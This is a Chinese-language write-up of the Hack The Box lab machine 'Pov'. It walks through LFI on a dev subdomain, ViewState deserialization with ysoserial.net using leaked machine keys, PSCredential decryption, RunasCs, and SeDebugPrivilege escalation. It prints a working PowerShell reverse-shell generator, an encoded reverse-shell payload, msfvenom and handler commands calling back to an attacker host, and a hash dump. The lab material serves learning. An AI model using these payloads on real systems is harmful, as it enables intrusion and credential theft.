HTB-Pov(Medium)

admin 2024年1月30日08:48:40评论343 views字数 7233阅读24分6秒阅读模式

知识点:web.config;VIESTATE 反序列化利用;PSCredential;Sedebugprivilege&winlogon。

HTB-Pov(Medium)

Scan

┌──(kali㉿kali)-[~/Desktop/htb/pov]└─$ sudo nmap -sC -sV -Pn 10.10.11.251[sudo] password for kali: Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-29 09:42 ESTNmap scan report for pov.htb (10.10.11.251)Host is up (0.34s latency).Not shown: 999 filtered tcp ports (no-response)PORT   STATE SERVICE VERSION80/tcp open  http    Microsoft IIS httpd 10.0|_http-title: pov.htb|_http-server-header: Microsoft-IIS/10.0| http-methods: |_  Potentially risky methods: TRACEService Info: OS: Windows; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 79.95 seconds

Enum

常规测一波无果,子域名有东西

┌──(kali㉿kali)-[~/Desktop/htb/pov]└─$ gobuster dns -d pov.htb -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt===============================================================Gobuster v3.6by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)===============================================================[+] Domain:     pov.htb[+] Threads:    10[+] Timeout:    1s[+] Wordlist:   /usr/share/amass/wordlists/subdomains-top1mil-5000.txt===============================================================Starting gobuster in DNS enumeration mode===============================================================Found: dev.pov.htb

页面进去有LFI,抓包,改file参数,这里简单就概况带过一下。看web.config等文件,其中web.config里面有解密密钥和验证密钥(这里打完了懒得忘记截图了,懒得搞了,打完去看了别的佬的解法偷的图HTB-Pov(Medium)以及如下等等,

HTB-Pov(Medium)

ViewState

HTB-Pov(Medium)可以使用如下手法攻击:https://book.hacktricks.xyz/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret#for-.net-framework-greater-than-4.5

github工具:https://github.com/pwntester/ysoserial.net?source=post_page-----75ab061c8adc--------------------------------

先生成一个base64编码的reverseshell。(https://gist.github.com/tothi/ab288fb523a4b32b51a53e542d40fe58#file-mkpsrevshell-py

#!/usr/bin/env python3## generate reverse powershell cmdline with base64 encoded args#import sysimport base64def help():    print("USAGE: %s IP PORT" % sys.argv[0])    print("Returns reverse shell PowerShell base64 encoded cmdline payload connecting to IP:PORT")    exit()try:    (ip, port) = (sys.argv[1], int(sys.argv[2]))except:    help()# payload from Nikhil Mittal @samratashok# https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3payload = '$client = New-Object System.Net.Sockets.TCPClient("%s",%d);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'payload = payload % (ip, port)cmdline = "powershell -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()print(cmdline)

把base生成的放到-c里执行即可。

.ysoserial.exe -p ViewState -g TextFormattingRunProperties --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1"  --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" --path="/portfolio/default.aspx" -c "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AOAAzACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=="

HTB-Pov(Medium)将结果放进burp发包,改__VIEWSTATE 参数中并发送请求,可以得到revshell。

HTB-Pov(Medium)

User

在 sfitz 的 Documents 目录中找到了一些有关用户 alading 的凭据。

PS C:userssfitzdocuments> type connection.xml<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">  <Obj RefId="0">    <TN RefId="0">      <T>System.Management.Automation.PSCredential</T>      <T>System.Object</T>    </TN>    <ToString>System.Management.Automation.PSCredential</ToString>    <Props>      <S N="UserName">alaading</S>      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cdfb54340c2929419cc739fe1a35bc88000000000200000000001066000000010000200000003b44db1dda743e1442e77627255768e65ae76e179107379a964fa8ff156cee21000000000e8000000002000020000000c0bd8a88cfd817ef9b7382f050190dae03b7c81add6b398b2d32fa5e5ade3eaa30000000a3d1e27f0b3c29dae1348e8adf92cb104ed1d95e39600486af909cf55e2ac0c239d4f671f79d80e425122845d4ae33b240000000b15cd305782edae7a3a75c7e8e3c7d43bc23eaae88fde733a28e1b9437d3766af01fdf6f2cf99d2a23e389326c786317447330113c5cfa25bc86fb0c6e1edda6</SS>    </Props>  </Obj></Objs>

HTB-Pov(Medium)尝试解密这个密码,看文章:https://mcpmag.com/articles/2017/07/20/save-and-read-sensitive-data-with-powershell.aspx?source=post_page-----75ab061c8adc--------------------------------

PS C:userssfitzdocuments> $credential = Import-CliXml -Path  C:userssfitzdocumentsconnection.xmlPS C:userssfitzdocuments> $credential.GetNetworkCredential().Passwordf8gQ8fynP44ek1m3PS C:userssfitzdocuments>

HTB-Pov(Medium)传一个runascs上去,弹一个allading的shell

PS C:userssfitzdesktop> wget 10.10.14.83:8000/RunasCs.exe -O RunanCs.exePS C:userssfitzdesktop> ls    Directory: C:userssfitzdesktopMode                LastWriteTime         Length Name                                                                  ----                -------------         ------ ----                                                                  -a----        1/29/2024   6:54 AM          51712 RunanCs.exe                                                           PS C:userssfitzdesktop> .RunanCs.exe alaading f8gQ8fynP44ek1m3 cmd.exe -r 10.10.14.83:5555[+] Running in session 0 with process function CreateProcessWithLogonW()[+] Using StationDesktop: Service-0x0-52d73$Default[+] Async process 'C:Windowssystem32cmd.exe' with pid 5384 created in background.

HTB-Pov(Medium)

Root

看看权限,发现有sedebugprivilege,配合winlogon直接可以梭。搜资料学着打秒了。

HTB-Pov(Medium)(但是这里有个疑问。为什么 RunasCs 生成的 powershell 具有 SeDebugPrivilege,而 cmd 没SeDebugPrivilege)

HTB-Pov(Medium)用metasploit改变我的shell方便实现进程迁移,(cmd交互可以certutil.exe自带的传

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.83 LPORT=6666 -f exe >shell.exeuse exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcpset lhost 10.10.14.83set lport 6666run

HTB-Pov(Medium)

meterpreter > hashdumpAdministrator:500:aad3b435b51404eeaad3b435b51404ee:f7c883121d0f63ee5b4312ba7572689b:::alaading:1001:aad3b435b51404eeaad3b435b51404ee:31c0583909b8349cbe92961f9dfa5dbf:::DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::sfitz:1000:aad3b435b51404eeaad3b435b51404ee:012e5ed95e8745ea5180f81648b6ec94:::WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:1fa5b00b7c6cc4ac2807c4d5b3dd3dab:::

原文始发于微信公众号(搁浅安全):HTB-Pov(Medium)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月30日08:48:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HTB-Pov(Medium)https://cn-sec.com/archives/2443653.html

发表评论

匿名网友 填写信息